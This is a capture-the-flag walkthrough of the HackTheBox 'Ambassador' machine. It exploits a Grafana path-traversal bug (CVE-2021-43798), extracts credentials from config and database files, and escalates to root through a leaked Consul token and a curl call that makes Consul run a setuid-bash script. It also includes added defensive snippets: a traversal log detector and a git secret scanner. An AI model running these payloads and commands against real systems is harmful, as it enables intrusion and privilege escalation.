
HackTheBox Ambassador

Published 2023/01/30

Ambassador

Initial access

nmap

┌──(kali㉿kali)-[~/Desktop/Ambassador]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.11.183 -oN nmap.log
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
|   256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_  256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Hugo 0.94.2
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Ambassador Development Server
3000/tcp open  ppp?    syn-ack ttl 63
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 23 Oct 2022 05:32:12 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 23 Oct 2022 05:31:38 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 23 Oct 2022 05:31:44 GMT
|_    Content-Length: 0
3306/tcp open  mysql   syn-ack ttl 63 MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.30-0ubuntu0.20.04.2
|   Thread ID: 10
|   Capabilities flags: 65535
|   Some Capabilities: FoundRows, Support41Auth, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, LongPassword, SupportsCompression, Speaks41ProtocolNew, InteractiveClient, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, ODBCClient, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: \x01
| \x01  ?Gz>>\x0F44wO}T\x0B\x12\x12K
|_  Auth Plugin Name: caching_sha2_password
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)

Ports 22, 80, 3000 and 3306 are open.

web


Nothing of interest was found here.

Accessing port 3000 shows a login page.
The version (8.2.0) is printed at the bottom of the page.

CVE-2021-43798

Now that the version is known, search for known vulnerabilities.

On 2021-12-03, we received a report that Grafana is vulnerable to directory traversal, allowing access to local files. We have confirmed this for versions v8.0.0-beta1 to v8.3.0. Thanks to our defense-in-depth approach, at no time has Grafana Cloud been vulnerable.

This tells us the version is vulnerable to path traversal. An exploit for it is also available.
exploit -> https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798]
└─$ cat domain.txt  
http://10.10.11.183:3000

Before running it, create domain.txt containing the target machine's IP address.

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798]
└─$ python3 exploit.py
  _____   _____   ___ __ ___ _     _ _ ________ ___ ___ 
 / __\ \ / / __|_|_  )  \_  ) |___| | |__ /__  / _ ( _ )                                                                        
| (__ \ V /| _|___/ / () / /| |___|_  _|_ \ / /\_, / _ \                                                                        
 \___| \_/ |___| /___\__/___|_|     |_|___//_/  /_/\___/                                                                        
                @pedrohavay / @acassio22                                                                                        
                                                                                                                                
? Enter the target list:  domain.txt

========================================

[i] Target: http://10.10.11.183:3000
                                                                                                                                
[!] Payload "http://10.10.11.183:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" works.
                                                                                                                                
[i] Analysing files...
                                                                                                                                
[i] File "/conf/defaults.ini" found in server.
[*] File saved in "./http_10_10_11_183_3000/defaults.ini".
                                                                                                                                
[i] File "/etc/grafana/grafana.ini" found in server.
[*] File saved in "./http_10_10_11_183_3000/grafana.ini".
                                                                                                                                
[i] File "/etc/passwd" found in server.
[*] File saved in "./http_10_10_11_183_3000/passwd".
                                                                                                                                
[i] File "/var/lib/grafana/grafana.db" found in server.
[*] File saved in "./http_10_10_11_183_3000/grafana.db".
                                                                                                                                
[i] File "/proc/self/cmdline" found in server.
[*] File saved in "./http_10_10_11_183_3000/cmdline".
                                                                                                                                
? Do you want to try to extract the passwords from the data source?  Yes

[i] Secret Key: SW2YcwTIb9zpOOhoPsMm                                         
[*] Bye Bye!

The exploit succeeded.
Each retrieved file was saved under http_10_10_11_183_3000.
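From the defender's side, the request pattern above is easy to spot in a reverse proxy's access log. As an added example (not part of the original post), the following detector decodes the request path, flags any `..` segment under `/public/plugins/`, and checks whether a reported Grafana version falls in the range the advisory quotes; the log lines in combined format are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Apache "combined" format (not from the original post).
SAMPLE_LOG = """\
10.10.14.2 - - [23/Oct/2022:05:40:01 +0000] "GET /login HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
10.10.14.2 - - [23/Oct/2022:05:40:03 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 1820 "-" "Mozilla/5.0"
10.10.14.2 - - [23/Oct/2022:05:40:05 +0000] "GET /public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 2108 "-" "python-requests/2.28"
10.10.14.2 - - [23/Oct/2022:05:40:06 +0000] "GET /public/plugins/alertlist/%252e%252e%252f%252e%252e%252fetc/grafana/grafana.ini HTTP/1.1" 200 9000 "-" "python-requests/2.28"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def fully_decode(path, rounds=3):
    """Percent-decode until the value stops changing (bounded), so single- and
    double-encoded '..' and '/' both end up as literal characters."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_plugin_traversal(path):
    """True for a request under /public/plugins/<plugin>/ whose decoded path
    contains a '..' segment: the CVE-2021-43798 pattern."""
    decoded = fully_decode(path.split("?", 1)[0])
    if not decoded.startswith("/public/plugins/"):
        return False
    return ".." in decoded.replace("\\", "/").split("/")

def find_traversal_attempts(log_text):
    """One record per matching request. A 200 on such a line suggests the file
    was served (unpatched); 400/404 suggests the traversal was rejected."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_plugin_traversal(m["path"]):
            hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                         "decoded_path": fully_decode(m["path"])})
    return hits

def grafana_version_affected(version):
    """Affected range from the advisory quoted above: v8.0.0-beta1 through v8.3.0.
    A pre-release suffix such as '-beta1' is ignored for the comparison."""
    core = version.lstrip("v").split("-", 1)[0]
    parts = tuple(int(p) for p in core.split("."))
    return (8, 0, 0) <= parts <= (8, 3, 0)
```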

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798/http_10_10_11_183_3000]
└─$ cat passwd      
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
grafana:x:113:118::/usr/share/grafana:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
consul:x:997:997::/home/consul:/bin/false

The passwd file confirms that a developer user exists.

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798/http_10_10_11_183_3000]
└─$ cat grafana.ini
#################################### Security ####################################
[security]
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false

# default admin user, created on startup
;admin_user = admin

# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = messageInABottle685427

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

In addition, an admin_password was found in grafana.ini.

Using this password, it was possible to log in.

sqlite3

Since the retrieved files include a db file, open it with sqlite3.

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798/http_10_10_11_183_3000]
└─$ sqlite3 grafana.db     
SQLite version 3.34.1 2021-01-20 14:10:07
Enter ".help" for usage hints.
sqlite>

List the tables.

sqlite> .tables
alert                       login_attempt             
alert_configuration         migration_log             
alert_instance              ngalert_configuration     
alert_notification          org                       
alert_notification_state    org_user                  
alert_rule                  playlist                  
alert_rule_tag              playlist_item             
alert_rule_version          plugin_setting            
annotation                  preferences               
annotation_tag              quota                     
api_key                     server_lock               
cache_data                  session                   
dashboard                   short_url                 
dashboard_acl               star                      
dashboard_provisioning      tag                       
dashboard_snapshot          team                      
dashboard_tag               team_member               
dashboard_version           temp_user                 
data_source                 test_data                 
kv_store                    user                      
library_element             user_auth                 
library_element_connection  user_auth_token

Tables such as user are present.

sqlite> select * from data_source;
2|1|1|mysql|mysql.yaml|proxy||dontStandSoCloseToMe63221!|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2022-10-23 05:27:28|0|{}|1|uKewFgM4z

The data_source table contains MySQL credentials.

mysql

Try connecting to MySQL with those credentials.

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798/http_10_10_11_183_3000]
└─$ mysql -h 10.10.11.183 -u grafana -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 29
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

The connection succeeded.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| grafana            |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| whackywidget       |
+--------------------+
6 rows in set (0.201 sec)

Besides the grafana database, there is a database called whackywidget.

MySQL [(none)]> use whackywidget
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.207 sec)

It contains a users table.

MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.297 sec)

The developer user's password is stored base64-encoded.

┌──(kali㉿kali)-[~/Desktop/Ambassador]
└─$ echo 'YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==' | base64 -d    
anEnglishManInNewYork027468

Decoding it yields the plaintext password.

Shell as developer

SSH

┌──(kali㉿kali)-[~/Desktop/Ambassador]
└─$ ssh developer@10.10.11.183                                 
developer@10.10.11.183's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 23 Oct 2022 01:07:05 PM UTC

  System load:           0.0
  Usage of /:            80.9% of 5.07GB
  Memory usage:          39%
  Swap usage:            0%
  Processes:             227
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.183
  IPv6 address for eth0: dead:beef::250:56ff:feb9:85cc


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Sep  2 02:33:30 2022 from 10.10.0.1
developer@ambassador:~$ whoami
developer

Initial access obtained.

user flag

developer@ambassador:~$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Flag obtained.

Privilege escalation

linpeas.sh

developer@ambassador:~$ ./linpeas.sh
╔══════════╣ Unexpected in /opt (usually empty)
total 16                                                                                                                        
drwxr-xr-x  4 root   root   4096 Sep  1 22:13 .
drwxr-xr-x 20 root   root   4096 Sep 15 17:24 ..
drwxr-xr-x  4 consul consul 4096 Mar 13  2022 consul
drwxrwxr-x  5 root   root   4096 Mar 13  2022 my-app

Inside /opt there are two directories, consul and my-app.

consul

Start with consul. Apparently it provides service discovery.

┌──(kali㉿kali)-[~/Desktop/Ambassador]
└─$ searchsploit consul
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)                            | linux/remote/46073.rb
Hashicorp Consul - Remote Command Execution via Services API (Metasploit)                     | linux/remote/46074.rb
Hassan Consulting Shopping Cart 1.18 - Directory Traversal                                    | cgi/remote/20281.txt
Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution                            | cgi/remote/21104.pl
PHPLeague 0.81 - '/consult/miniseul.php?cheminmini' Remote File Inclusion                     | php/webapps/28864.txt
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

A rough search for vulnerabilities returns a few hits, so look them up on the web.
Reference -> https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/misc/consul_service_exec

This module exploits Hashicorp Consul's Services API to gain remote command
execution on a Consul node.

So arbitrary commands can be run through the Services API, but there seems to be no way to run the module itself on the box.

res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, 'v1/agent/service/register'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {
        ID: service_name.to_s,
        Name: service_name.to_s,
        Address: '127.0.0.1',
        Port: 80,
        check: {
          Args: [arg1, arg2, cmd.to_s],
          interval: '10s',
          Timeout: '86400s'
        }
      }.to_json
})

Reading the published code shows which parameters are required.
However, no token has been found yet, so look into my-app.

developer@ambassador:/opt/my-app$ ls -la
total 24
drwxrwxr-x 5 root root 4096 Mar 13  2022 .
drwxr-xr-x 4 root root 4096 Sep  1 22:13 ..
drwxrwxr-x 4 root root 4096 Mar 13  2022 env
drwxrwxr-x 8 root root 4096 Mar 14  2022 .git
-rw-rw-r-- 1 root root 1838 Mar 13  2022 .gitignore
drwxrwxr-x 3 root root 4096 Mar 13  2022 whackywidget

Inside my-app there is a .git directory.

developer@ambassador:/opt/my-app$ git show
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script

diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
 # We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
 
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
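Review bot: deleting `--token bb03b43b-1d81-d62b-24b5-39540ee469b5` from the script does not revoke it; the value is still in this commit's parent (`git show HEAD~1` or `git log -p` returns it), so the token has to be rotated in Consul's ACL system and the history rewritten or the repository kept out of a world-readable path like /opt/my-app. The new version also relies on `CONSUL_HTTP_TOKEN` being exported but only says so in a comment; a guard such as `: "${CONSUL_HTTP_TOKEN:?export CONSUL_HTTP_TOKEN first}"` before the `consul kv put` would fail loudly instead of sending an unauthenticated request.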

The history reveals the Consul token.
Now all that is missing is a service_name value, and the attack should work.
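The token survived only because it was deleted from the working tree, not from history. As an added example (not from the original post), this scanner walks `git log -p` output and reports secrets that were removed in a later commit but remain recoverable; the log text and the UUID are constructed placeholders modelled on the commit above, and the pattern list is a minimal assumption.

```python
import re

# Constructed `git log -p` text modelled on the commit shown above; the token is a
# placeholder and the second (older) commit is invented.
GIT_LOG = """\
commit 33a53ef9a207976d5ceceddc41a199558843bf3c
    tidy config script
diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
 
-consul kv put --token 00000000-1111-2222-3333-444444444444 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
commit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    add config script
diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
--- /dev/null
+++ b/whackywidget/put-config-in-consul.sh
@@ -0,0 +1,3 @@
+# Export MYSQL_PASSWORD before running
+
+consul kv put --token 00000000-1111-2222-3333-444444444444 whackywidget/db/mysql_pw $MYSQL_PASSWORD
"""

# Ordered: the first pattern that matches a line wins.
SECRET_PATTERNS = [
    ("uuid-token", re.compile(r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I)),
    ("cli-token-flag", re.compile(r"--token[ =]\S+")),
    ("assignment", re.compile(r"\b(password|passwd|secret|api_key)\s*=\s*\S+", re.I)),
]

def scan_git_log(log_text):
    """Every added (+) or removed (-) line in any commit that matches a secret pattern."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):
            p = line[4:]
            path = p[2:] if p.startswith("b/") else p
        elif line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            for kind, pat in SECRET_PATTERNS:
                m = pat.search(line[1:])
                if m:
                    findings.append({"commit": commit, "file": path, "change": line[0],
                                     "kind": kind, "match": m.group(0)})
                    break
    return findings

def removed_but_recoverable(findings):
    """Secrets whose only 'fix' was deletion: still in history, so they must be rotated."""
    by_value = {}
    for f in findings:
        info = by_value.setdefault(f["match"], {"added_in": [], "removed_in": []})
        info["added_in" if f["change"] == "+" else "removed_in"].append(f["commit"])
    return {v: i for v, i in by_value.items() if i["removed_in"]}
```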

def execute_command(cmd, _opts = {})
    uri = target_uri.path
    service_name = Rex::Text.rand_text_alpha(5..10)
    print_status("Creating service '#{service_name}'")

Looking closer, service_name is generated randomly.
In other words, it can be any value we choose.

curl --header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" --request PUT -d '{"ID": "shoo", "Name": "shoo", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/shoo.sh"], "interval": "10s", "timeout": "86400s"}}' http://127.0.0.1:8500/v1/agent/service/register

The curl command above was assembled from the information gathered so far.
This time, privilege escalation is attempted by having it run shoo.sh.

developer@ambassador:~$ echo 'chmod +s /usr/bin/bash' > /tmp/shoo.sh

For reference, shoo.sh is a script that sets the setuid bit (+s) on bash.

developer@ambassador:~$ find / -type f -user root -perm -4000 2>/dev/null
/usr/bin/umount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/bash
/usr/bin/su
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/fusermount

After running the curl command, a search with -perm -4000 shows that bash is now in the list.

Shell as root

bash

developer@ambassador:~$ bash -p
bash-5.0# whoami
root

Privilege escalation succeeded.

root flag

bash-5.0# cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Flag obtained.

Thoughts

This box felt like it was stitched together from pieces of previous boxes, which made it a very good box for review. For the Services API part, my day-to-day experience developing APIs was a real plus. I want to keep studying development and keep approaching boxes with a developer's perspective as well.
